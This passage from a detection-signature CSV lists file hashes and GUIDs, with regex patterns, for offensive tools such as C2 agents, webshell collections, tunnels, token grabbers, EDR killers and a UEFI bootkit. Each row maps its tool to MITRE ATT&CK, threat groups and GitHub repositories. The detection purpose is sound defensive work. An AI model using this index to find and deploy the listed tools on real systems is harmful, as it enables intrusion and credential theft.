T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39799" "*d65a63d32b46e3b20f42174834f5a367ab0ffbfc1b0bd4b368613c86d01a71e2*",".{0,1000}d65a63d32b46e3b20f42174834f5a367ab0ffbfc1b0bd4b368613c86d01a71e2.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","39800" 
"*d65a7eed824f91e0ff00f273650903c1e14335dab57480e6e09a83675c4b407a*",".{0,1000}d65a7eed824f91e0ff00f273650903c1e14335dab57480e6e09a83675c4b407a.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an 'all in one' Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some of). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#filehash","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","39801" "*d65eb27a092bb12505201a91b0f602c6c7dfc81d5c6073d8032bc9d592ed3fa0*",".{0,1000}d65eb27a092bb12505201a91b0f602c6c7dfc81d5c6073d8032bc9d592ed3fa0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39802" "*d65fc5abbf245e6cca94de0ba4e5da6d68c75f4905e80da957bb50afc475fcac*",".{0,1000}d65fc5abbf245e6cca94de0ba4e5da6d68c75f4905e80da957bb50afc475fcac.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 -
T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","39803" "*d6658fde26b809968ead7f1b80dbabe0738ad07a6906ab5e809e04aa156c9566*",".{0,1000}d6658fde26b809968ead7f1b80dbabe0738ad07a6906ab5e809e04aa156c9566.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39804" "*d66d64d4f3db00002708c51dc67e916c760e749f71c32c0a35943106371ac654*",".{0,1000}d66d64d4f3db00002708c51dc67e916c760e749f71c32c0a35943106371ac654.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39806" "*d66e5c655b6ecf6108ebdba4c14b669f8b9dc4c18cfd8eb309878ad936fdc2b9*",".{0,1000}d66e5c655b6ecf6108ebdba4c14b669f8b9dc4c18cfd8eb309878ad936fdc2b9.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","39807" "*d67630a3210bfcdd4b2fa2d48cdcdba0034710fd5ead616d9d5e4ce38e3c9809*",".{0,1000}d67630a3210bfcdd4b2fa2d48cdcdba0034710fd5ead616d9d5e4ce38e3c9809.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","#filehash","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","39808" 
"*d67c342b9ffebd2350cb81d6dbbb35071246fb19*",".{0,1000}d67c342b9ffebd2350cb81d6dbbb35071246fb19.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","39811" "*d683205c9fad76e28a8e4cd0d72285e9a8573cc95c8b77f30186089459675817*",".{0,1000}d683205c9fad76e28a8e4cd0d72285e9a8573cc95c8b77f30186089459675817.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#filehash","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","39812" "*d683205c9fad76e28a8e4cd0d72285e9a8573cc95c8b77f30186089459675817*",".{0,1000}d683205c9fad76e28a8e4cd0d72285e9a8573cc95c8b77f30186089459675817.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","39813" "*d685191b55fec64ce5fa0ced8bff472aa1a297d0e77354da28f34d0f67a4dec4*",".{0,1000}d685191b55fec64ce5fa0ced8bff472aa1a297d0e77354da28f34d0f67a4dec4.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data 
Exfiltration","https://github.com/0xtosh/dnskire","1","0","#filehash","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","39814" "*d68790ec9278e5bcaddc365ff394278cd02e55b0a1526a5f9e7df9dcbc7d25db*",".{0,1000}d68790ec9278e5bcaddc365ff394278cd02e55b0a1526a5f9e7df9dcbc7d25db.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","39816" "*d69430717f07c774cdb8ea58b32b066e99dbf3cbc046e876b8ea73c20a3a6507*",".{0,1000}d69430717f07c774cdb8ea58b32b066e99dbf3cbc046e876b8ea73c20a3a6507.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","39819" "*D6948EFC-AA15-413D-8EF1-032C149D3FBB*",".{0,1000}D6948EFC\-AA15\-413D\-8EF1\-032C149D3FBB.{0,1000}","offensive_tool_keyword","FormThief","Spoofing desktop login applications with WinForms and WPF","T1204.002 - T1056.004 - T1071.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/mlcsec/FormThief","1","0","#GUIDproject","N/A","8","2","173","31","2024-02-19T22:40:09Z","2024-02-19T22:34:07Z","39820" "*d697ea397da7603417baaf232512864bd8ecedde47dd199c2d32f653619f0f3b*",".{0,1000}d697ea397da7603417baaf232512864bd8ecedde47dd199c2d32f653619f0f3b.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","39821" "*d6a875122b65917b00c7afdf247b3e20619b7fdc8622e9a56280912f013e5522*",".{0,1000}d6a875122b65917b00c7afdf247b3e20619b7fdc8622e9a56280912f013e5522.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","39822" "*D6AAED62-BBFC-4F2A-A2A4-35EC5B2A4E07*",".{0,1000}D6AAED62\-BBFC\-4F2A\-A2A4\-35EC5B2A4E07.{0,1000}","offensive_tool_keyword","DecryptTeamViewer","Enumerate and decrypt TeamViewer credentials from Windows 
registry","T1552.001 - T1003 - T1119 - T1012","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/V1V1/DecryptTeamViewer","1","0","#GUIDproject","N/A","7","3","241","62","2021-12-05T09:19:56Z","2020-02-07T07:50:47Z","39823" "*d6b26f886ba34b221dca49d48e9c3795ff9dc43a5318113c2d269a116ef50b9c*",".{0,1000}d6b26f886ba34b221dca49d48e9c3795ff9dc43a5318113c2d269a116ef50b9c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","39824" "*d6b5056c0a990f73c3f22aee2a6065812d1f78fc87e0362877716ddffd71d831*",".{0,1000}d6b5056c0a990f73c3f22aee2a6065812d1f78fc87e0362877716ddffd71d831.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","39825" "*d6b6a59d5127bab7f135eb30f63484589a812fa16eac15068ba4e74a51c92f6b*",".{0,1000}d6b6a59d5127bab7f135eb30f63484589a812fa16eac15068ba4e74a51c92f6b.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","39826" "*d6bd37f7c1bcc7ea255d46c3f8f07e6fd754f566dd05682584def7c8ba0aebf9*",".{0,1000}d6bd37f7c1bcc7ea255d46c3f8f07e6fd754f566dd05682584def7c8ba0aebf9.{0,1000}","offensive_tool_keyword","Krueger","remotely killing EDR with WDAC","T1562.001 - T1562.004 - T1218.011 - T1548.002 - T1027","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/logangoins/Krueger","1","0","#filehash","N/A","9","4","353","42","2025-01-06T06:57:14Z","2024-11-15T20:11:01Z","39827" "*d6bf093219aa31e78949446443ddda4efac3bfabd3f1d19222a9b394cedc1a96*",".{0,1000}d6bf093219aa31e78949446443ddda4efac3bfabd3f1d19222a9b394cedc1a96.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39828" "*d6c0b483cd33449f5b0f5116e07f8afdb639d1d3137912ce5d585bce4203a02e*",".{0,1000}d6c0b483cd33449f5b0f5116e07f8afdb639d1d3137912ce5d585bce4203a02e.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39829" "*d6d9c093418581fe4a58b4e2d8673f063f216dd23d7cd65f5f366cc714149b07*",".{0,1000}d6d9c093418581fe4a58b4e2d8673f063f216dd23d7cd65f5f366cc714149b07.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39832" "*d6db60417e9ca985a89101f7aa8b06a021fde4f5f7f7a58fa21b048008df2e56*",".{0,1000}d6db60417e9ca985a89101f7aa8b06a021fde4f5f7f7a58fa21b048008df2e56.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#filehash","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","39833" "*d6e360d8a78cb4495df17f401df3a5c11d3ae13e46ebe7d94007bfb1d263490c*",".{0,1000}d6e360d8a78cb4495df17f401df3a5c11d3ae13e46ebe7d94007bfb1d263490c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39835" "*d6edddd2dcac14dfe70c6b396236d6d3a95b0c1f6fe8fec38381049f3823bdb6*",".{0,1000}d6edddd2dcac14dfe70c6b396236d6d3a95b0c1f6fe8fec38381049f3823bdb6.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and 
impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#filehash","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","39838" "*d6f5f4e0aa4e8a9b34887f008ff0882a4f3738d35c9df9c023512d1d5f6d9871*",".{0,1000}d6f5f4e0aa4e8a9b34887f008ff0882a4f3738d35c9df9c023512d1d5f6d9871.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","39839" "*d6fb61d7e2e1c8328be688eca56909cd1d4f33e595fd733663630cdd895c32c9*",".{0,1000}d6fb61d7e2e1c8328be688eca56909cd1d4f33e595fd733663630cdd895c32c9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39840" "*d6fea46b2c10f12284b38995e9b6cee32b2122ea9ba65c00c0c3cc5eb7448e5d*",".{0,1000}d6fea46b2c10f12284b38995e9b6cee32b2122ea9ba65c00c0c3cc5eb7448e5d.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - 
TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","0","#filehash","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","39841" "*d6ffeb0cc599c198e2d7e053777e06273dc45fb08ede6fc8a529eed81792f9d1*",".{0,1000}d6ffeb0cc599c198e2d7e053777e06273dc45fb08ede6fc8a529eed81792f9d1.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","39842" "*d700c8a3a4ecbb1e547b3c14a5a2a3605cabbabc8350284e923982809945694d*",".{0,1000}d700c8a3a4ecbb1e547b3c14a5a2a3605cabbabc8350284e923982809945694d.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","39843" "*d7018d7037ff228d9f8528846861639c1f7c139e7769c893ae350c20098e55e5*",".{0,1000}d7018d7037ff228d9f8528846861639c1f7c139e7769c893ae350c20098e55e5.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","0","#filehash","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","39844" "*d7020b26924bfcef8d88089ad6f9f496cc9b39ed08ffaf3ae857703ae154c198*",".{0,1000}d7020b26924bfcef8d88089ad6f9f496cc9b39ed08ffaf3ae857703ae154c198.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux 
#filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","39845" "*d71724687c2914d5e68596f5951d1a94fa511dd2cb57f7fbc39f771a6ec43ae7*",".{0,1000}d71724687c2914d5e68596f5951d1a94fa511dd2cb57f7fbc39f771a6ec43ae7.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","#filehash","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","39849" "*d71c3ea3ec686a8c080f8310b25cfe4696773a06fe151d03eb9a69de9147abcb*",".{0,1000}d71c3ea3ec686a8c080f8310b25cfe4696773a06fe151d03eb9a69de9147abcb.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","#filehash","N/A","10","","N/A","","","","39852" "*d71e7b439225124e610f0a5faa4a8170961d5ed80088144a1326db7e661cf646*",".{0,1000}d71e7b439225124e610f0a5faa4a8170961d5ed80088144a1326db7e661cf646.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","0","#filehash","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","39853" "*d7235f7b09d231562a5bb697e521c635343eafc044f92f11c541ea89d04ae7c4*",".{0,1000}d7235f7b09d231562a5bb697e521c635343eafc044f92f11c541ea89d04ae7c4.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","39854" 
"*d7257981496461fd58ba1e00931ad71ff49a9e41f7e81d5ce04de265674b14f7*",".{0,1000}d7257981496461fd58ba1e00931ad71ff49a9e41f7e81d5ce04de265674b14f7.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","39855" "*d737dd339a9a013f78d089c01da72576a4d89cdb2f002ffdd666d04ae726b142*",".{0,1000}d737dd339a9a013f78d089c01da72576a4d89cdb2f002ffdd666d04ae726b142.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39859" "*d739d765024b9a15d65d07e64a21dc0796db4951305ffb864e9d7f781bac6b81*",".{0,1000}d739d765024b9a15d65d07e64a21dc0796db4951305ffb864e9d7f781bac6b81.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","39860" 
"*d73ce38475b90ce68cb44cbaa7f76b091e06a970aba887a248e8bff5e9b46b57*",".{0,1000}d73ce38475b90ce68cb44cbaa7f76b091e06a970aba887a248e8bff5e9b46b57.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","39861" "*d73fc7fcd3b0983b7ecc9590562fb0e83611dd1e3199437b108a69cddce0ac07*",".{0,1000}d73fc7fcd3b0983b7ecc9590562fb0e83611dd1e3199437b108a69cddce0ac07.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","39862" "*D7484EBA-6357-4D81-B355-066E28D5DF72*",".{0,1000}D7484EBA\-6357\-4D81\-B355\-066E28D5DF72.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","#GUIDproject","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","39863" "*d748b4244f359f0d9c46860ea8918940c8cd05e4a65c3ae5b99208d719a3a9c1*",".{0,1000}d748b4244f359f0d9c46860ea8918940c8cd05e4a65c3ae5b99208d719a3a9c1.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","39864" "*d752324eda2190948d57852d1aee1a15e77aea5aaf09522056536c4ee0e85929*",".{0,1000}d752324eda2190948d57852d1aee1a15e77aea5aaf09522056536c4ee0e85929.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","39865" "*d75323d0a62e8baea946b82ced3bd78c4e07a6dfa20f07480b7c093c4b977fa4*",".{0,1000}d75323d0a62e8baea946b82ced3bd78c4e07a6dfa20f07480b7c093c4b977fa4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39866" "*d7538d432a986c9f7006dfb742ed5f1673bea600c14da5168f38abf44f405896*",".{0,1000}d7538d432a986c9f7006dfb742ed5f1673bea600c14da5168f38abf44f405896.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. 
